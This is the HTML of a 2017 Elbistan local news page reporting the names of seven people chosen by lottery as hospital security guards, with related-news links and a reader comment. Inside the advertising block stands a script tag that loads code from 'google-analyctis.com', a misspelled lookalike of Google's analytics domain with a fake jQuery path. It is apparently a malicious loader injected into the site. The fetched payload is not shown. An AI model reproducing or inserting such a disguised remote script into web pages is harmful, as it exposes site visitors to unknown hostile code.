src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/03/kaymakam_akkoyun_5.jpg" alt="Akkoyun: “Kadınlar, toplumun temel taşlarıdır”" class="pull-left" /> <div class="caption-line"><p>Akkoyun: “Kadınlar, toplumun temel taşlarıdır”</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Hastane güvenlik görevlisi olanların isimleri</h1> <h2 class="lead" itemprop="description"><strong>300 Yataklı Elbistan Devlet Hastanesi’nde ihtiyaç duyulan 50 taşeron personelin belirlenmesi amacıyla kura çekimi yapıldı.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2017-03-10 15:55:46" content="2017-03-10T15:55:46+02:00">10 Mart 2017 Cuma 15:55</span></p> <p class="pull-right">Bu haber <b class="hitCounter"></b> kez okundu.</p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg" alt="Hastane güvenlik görevlisi olanların isimleri" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div> <div class="reklam reklam134 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" width="200" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" /></object></div> <div class="reklam reklam135 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/ceren4.swf" width="600" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/ceren4.swf" /></object></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNoSpacing"><b><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">&#160; &#160; &#160; &#160; &#160; &#160;&#160;</span></b><span style="font-size:&#10;10.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">300 Yataklı Elbistan Devlet Hastanesi’nde ihtiyaç duyulan 50 taşeron personelin belirlenmesi amacıyla kura çekimi yapıldı. <o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">7 güvenlik görevlisi için kuraya 295 kişinin ismi dahil edildi.<o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; Çekiliş sonucunda asil listede yer alanların isimleri şöyle:<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Erdal Kısa, Selda Çiftlikli, Ömer Osman Karataş, İlker Cengiz, Nevzat Önat, Özlem Kurt, Yakup Öztürk.&#160;<o:p></o:p></span></p></div> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastane-klinik-destek-elemani-olanlarin-isimleri-h38144.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastane-bilgi-sistemleri-elemani-olanlarin-isimleri-h38141.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastaneye-isci-alim-kurasi-basladi-h38134.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/egitim-kultur/8-bin-81-aday-ygsde-ter-dokecek-h38143.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/randevusuz-arac-muayenesi-yapilmayacak-h38140.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/egitim-kultur/istiklal-marsini-en-guzel-onlar-okudu-h38138.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/spor/elbistanspor-play-off-maclarina-cikmiyor-h38137.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-adliyesinde-aile-mahkemesi-kuruldu-h38136.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/saglik/tsmden-bobrekdere-ziyaret-h38135.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hastane-isci-cekilisi-bugun-yapilacak-h38129.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/banyoda-dusen-yasli-kadin-hayatini-kaybetti-h38128.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/havamiz-bir-onceki-yila-gore-daha-temiz-h38123.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/pinarbasinda-su-seviyesi-yukseliyor-h38122.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/egitim-kultur/kucuk-nisanur-istiklal-marsini-guzel-okuma-yarismasinda-birinci-oldu-h38127.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistandaki-meralar-kiralanacak-h38126.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kasap-ahmet-ceyrek-asirlik-deneyimi-ile-hizmete-acildi-h38125.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/50-isci-icin-kura-genclik-merkezinde-cekilecek-h38121.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/politika/chpli-vekil-pazar-yeri-yangini-tbmmye-tasidi-h38120.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/politika/oztunc-pazar-esnafinin-magduriyeti-giderilmeli-h38119.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tes-isten-kadin-santral-calisanlarina-gul-jesti-h38118.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/politika/chp-kadin-kollari-kadinlar-gununu-kutladi-h38117.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/muftulukten-8-mart-kadinlar-gunu-konferansi-h38115.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-genc-kursu-programinda-konusacak-h38114.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/hastane-klinik-destek-elemani-olanlarin-isimleri-h38144.html" title="Hastane klinik destek elemanı olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_klinik_destek_elemani_olanlarin_isimleri_h38144_c1eca.jpg" alt="Hastane klinik destek elemanı olanların isimleri" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastane klinik destek elemanı olanların isimleri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hastane-guvenlik-gorevlisi-olanlarin-isimleri-h38142.html" title="Hastane güvenlik görevlisi olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_guvenlik_gorevlisi_olanlarin_isimleri_h38142_3660c.jpg" alt="Hastane güvenlik görevlisi olanların isimleri" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastane güvenlik görevlisi olanların isimleri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hastane-bilgi-sistemleri-elemani-olanlarin-isimleri-h38141.html" title="Hastane bilgi sistemleri elemanı olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_bilgi_sistemleri_elemani_olanlarin_isimleri_h38141_e8df1.jpg" alt="Hastane bilgi sistemleri elemanı olanların isimleri" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastane bilgi sistemleri elemanı olanların isimleri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html" title="Hastaneye temizlik görevlisi olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastaneye_temizlik_gorevlisi_olanlarin_isimleri_h38139_68918.jpg" alt="Hastaneye temizlik görevlisi olanların isimleri" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastaneye temizlik görevlisi olanların isimleri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-isci-alim-kurasi-basladi-h38134.html" title="Hastaneye işçi alım kurası başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastaneye_isci_alim_kurasi_basladi_h38134_583f7.jpg" alt="Hastaneye işçi alım kurası başladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastaneye işçi alım kurası başladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/egitim-kultur/8-bin-81-aday-ygsde-ter-dokecek-h38143.html" title="8 bin 81 aday YGS’de ter dökecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/8_bin_81_aday_ygsde_ter_dokecek_h38143_21e3f.jpg" alt="8 bin 81 aday YGS’de ter dökecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">8 bin 81 aday YGS’de ter dökecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/randevusuz-arac-muayenesi-yapilmayacak-h38140.html" title="Randevusuz araç muayenesi yapılmayacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/randevusuz_arac_muayenesi_yapilmayacak_h38140_e81da.JPG" alt="Randevusuz araç muayenesi yapılmayacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Randevusuz araç muayenesi yapılmayacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/egitim-kultur/istiklal-marsini-en-guzel-onlar-okudu-h38138.html" title="İstiklal Marşı’nı en güzel onlar okudu"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/istiklal_marsini_en_guzel_onlar_okudu_h38138_65d13.jpg" alt="İstiklal Marşı’nı en güzel onlar okudu" /> <div class="carousel-caption"> <h2> <span style="font-size:">İstiklal Marşı’nı en güzel onlar okudu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-play-off-maclarina-cikmiyor-h38137.html" title="Elbistanspor, play-off maçlarına çıkmıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/elbistanspor_play_off_maclarina_cikmiyor_h38137_e446b.jpg" alt="Elbistanspor, play-off maçlarına çıkmıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor, play-off maçlarına çıkmıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-adliyesinde-aile-mahkemesi-kuruldu-h38136.html" title="Elbistan Adliyesi’nde Aile Mahkemesi kuruldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/elbistan_adliyesinde_aile_mahkemesi_kuruldu_h38136_e20b9.JPG" alt="Elbistan Adliyesi’nde Aile Mahkemesi kuruldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Adliyesi’nde Aile Mahkemesi kuruldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/saglik/tsmden-bobrekdere-ziyaret-h38135.html" title="TSM’den BÖBREKDER’e ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/tsmden_bobrekdere_ziyaret_h38135_4e4cf.JPG" alt="TSM’den BÖBREKDER’e ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">TSM’den BÖBREKDER’e ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hastane-isci-cekilisi-bugun-yapilacak-h38129.html" title="Hastane işçi çekilişi bugün yapılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/hastane_isci_cekilisi_bugun_yapilacak_h38129_6a91c.jpg" alt="Hastane işçi çekilişi bugün yapılacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hastane işçi çekilişi bugün yapılacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/banyoda-dusen-yasli-kadin-hayatini-kaybetti-h38128.html" title="Banyoda düşen yaşlı kadın, hayatını kaybetti"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/banyoda_dusen_yasli_kadin_hayatini_kaybetti_h38128_c207d.jpg" alt="Banyoda düşen yaşlı kadın, hayatını kaybetti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Banyoda düşen yaşlı kadın, hayatını kaybetti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/havamiz-bir-onceki-yila-gore-daha-temiz-h38123.html" title="Havamız, bir önceki yıla göre daha temiz"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/havamiz_bir_onceki_yila_gore_daha_temiz_h38123_1e532.JPG" alt="Havamız, bir önceki yıla göre daha temiz" /> <div class="carousel-caption"> <h2> <span style="font-size:">Havamız, bir önceki yıla göre daha temiz</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/pinarbasinda-su-seviyesi-yukseliyor-h38122.html" title="Pınarbaşı’nda su seviyesi yükseliyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/pinarbasinda_su_seviyesi_yukseliyor_h38122_61852.JPG" alt="Pınarbaşı’nda su seviyesi yükseliyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Pınarbaşı’nda su seviyesi yükseliyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/egitim-kultur/kucuk-nisanur-istiklal-marsini-guzel-okuma-yarismasinda-birinci-oldu-h38127.html" title="Küçük Nisanur, İstiklal Marşı’nı güzel okuma yarışmasında birinci oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/kucuk_nisanur_istiklal_marsini_guzel_okuma_yarismasinda_birinci_oldu_h38127_0ab9c.jpg" alt="Küçük Nisanur, İstiklal Marşı’nı güzel okuma yarışmasında birinci oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Küçük Nisanur, İstiklal Marşı’nı güzel okuma yarışmasında birinci oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistandaki-meralar-kiralanacak-h38126.html" title="Elbistan’daki meralar kiralanacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/elbistandaki_meralar_kiralanacak_h38126_e1b62.jpg" alt="Elbistan’daki meralar kiralanacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’daki meralar kiralanacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kasap-ahmet-ceyrek-asirlik-deneyimi-ile-hizmete-acildi-h38125.html" title="Kasap Ahmet, çeyrek asırlık deneyimi ile hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/kasap_ahmet_ceyrek_asirlik_deneyimi_ile_hizmete_acildi_h38125_0a9bb.JPG" alt="Kasap Ahmet, çeyrek asırlık deneyimi ile hizmete açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kasap Ahmet, çeyrek asırlık deneyimi ile hizmete açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/50-isci-icin-kura-genclik-merkezinde-cekilecek-h38121.html" title="50 işçi için kura, Gençlik Merkezi’nde çekilecek"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/50_isci_icin_kura_genclik_merkezinde_cekilecek_h38121_22ae2.JPG" alt="50 işçi için kura, Gençlik Merkezi’nde çekilecek" /> <div class="carousel-caption"> <h2> <span style="font-size:">50 işçi için kura, Gençlik Merkezi’nde çekilecek</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/politika/chpli-vekil-pazar-yeri-yangini-tbmmye-tasidi-h38120.html" title="CHP’li vekil, Pazar yeri yangını TBMM’ye taşıdı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/chpli_vekil_pazar_yeri_yangini_tbmmye_tasidi_h38120_d7a58.jpg" alt="CHP’li vekil, Pazar yeri yangını TBMM’ye taşıdı" /> <div class="carousel-caption"> <h2> <span style="font-size:">CHP’li vekil, Pazar yeri yangını TBMM’ye taşıdı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/politika/oztunc-pazar-esnafinin-magduriyeti-giderilmeli-h38119.html" title="Öztunç: “Pazar esnafının mağduriyeti giderilmeli”"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/oztunc_pazar_esnafinin_magduriyeti_giderilmeli_h38119_6a3b7.JPG" alt="Öztunç: “Pazar esnafının mağduriyeti giderilmeli”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç: “Pazar esnafının mağduriyeti giderilmeli”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tes-isten-kadin-santral-calisanlarina-gul-jesti-h38118.html" title="Tes-İş’ten kadın santral çalışanlarına gül jesti"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/tes_isten_kadin_santral_calisanlarina_gul_jesti_h38118_7fba3.jpg" alt="Tes-İş’ten kadın santral çalışanlarına gül jesti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Tes-İş’ten kadın santral çalışanlarına gül jesti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/politika/chp-kadin-kollari-kadinlar-gununu-kutladi-h38117.html" title="CHP Kadın Kolları, Kadınlar Gününü kutladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/chp_kadin_kollari_kadinlar_gununu_kutladi_h38117_1b2f3.JPG" alt="CHP Kadın Kolları, Kadınlar Gününü kutladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">CHP Kadın Kolları, Kadınlar Gününü kutladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/muftulukten-8-mart-kadinlar-gunu-konferansi-h38115.html" title="Müftülükten 8 Mart Kadınlar Günü konferansı"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/muftulukten_8_mart_kadinlar_gunu_konferansi_h38115_8e864.jpg" alt="Müftülükten 8 Mart Kadınlar Günü konferansı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Müftülükten 8 Mart Kadınlar Günü konferansı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-genc-kursu-programinda-konusacak-h38114.html" title="Ünal, Genç Kürsü programında konuşacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2017/03/unal_genc_kursu_programinda_konusacak_h38114_09401.jpg" alt="Ünal, Genç Kürsü programında konuşacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal, Genç Kürsü programında konuşacak</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">1</span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(38142);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="38142" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="bd81b20cc4e4f9edf748b6cf7ff0ac271636bdb8" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> <div id="comment_list"> <div class="comment_box row-fluid" id="comment_175655"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Bir vatandaş</b> <small class="time">24 dakika önce</small> <p class="text">VAllaha kendimi tutamayıp söylicem çoğunluğu akp ilçe teşkilatına yakın isim ve soy isimler inanıyorum bundada vardır birşeyler</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Bir vatandaş" id="175655"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like175655" onclick="like(175655,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike175655">2</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike175655" onclick="like(175655,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike175655">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> </div> <!-- #comment_list --> </div> <!-- .tab-pane --> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/hastane-klinik-destek-elemani-olanlarin-isimleri-h38144.html" title="Hastane klinik destek elemanı olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_klinik_destek_elemani_olanlarin_isimleri_h38144_c1eca.jpg" alt="Hastane klinik destek elemanı olanların isimleri" /> <span>Hastane klinik destek elemanı olanların isimleri</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/hastane-bilgi-sistemleri-elemani-olanlarin-isimleri-h38141.html" title="Hastane bilgi sistemleri elemanı olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastane_bilgi_sistemleri_elemani_olanlarin_isimleri_h38141_e8df1.jpg" alt="Hastane bilgi sistemleri elemanı olanların isimleri" /> <span>Hastane bilgi sistemleri elemanı olanların isimleri</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/randevusuz-arac-muayenesi-yapilmayacak-h38140.html" title="Randevusuz araç muayenesi yapılmayacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/randevusuz_arac_muayenesi_yapilmayacak_h38140_e81da.JPG" alt="Randevusuz araç muayenesi yapılmayacak" /> <span>Randevusuz araç muayenesi yapılmayacak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/hastaneye-temizlik-gorevlisi-olanlarin-isimleri-h38139.html" title="Hastaneye temizlik görevlisi olanların isimleri"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/hastaneye_temizlik_gorevlisi_olanlarin_isimleri_h38139_68918.jpg" alt="Hastaneye temizlik görevlisi olanların isimleri" /> <span>Hastaneye temizlik görevlisi olanların isimleri</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-adliyesinde-aile-mahkemesi-kuruldu-h38136.html" title="Elbistan Adliyesi’nde Aile Mahkemesi kuruldu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/03/elbistan_adliyesinde_aile_mahkemesi_kuruldu_h38136_e20b9.JPG" alt="Elbistan Adliyesi’nde Aile Mahkemesi kuruldu" /> <span>Elbistan Adliyesi’nde Aile 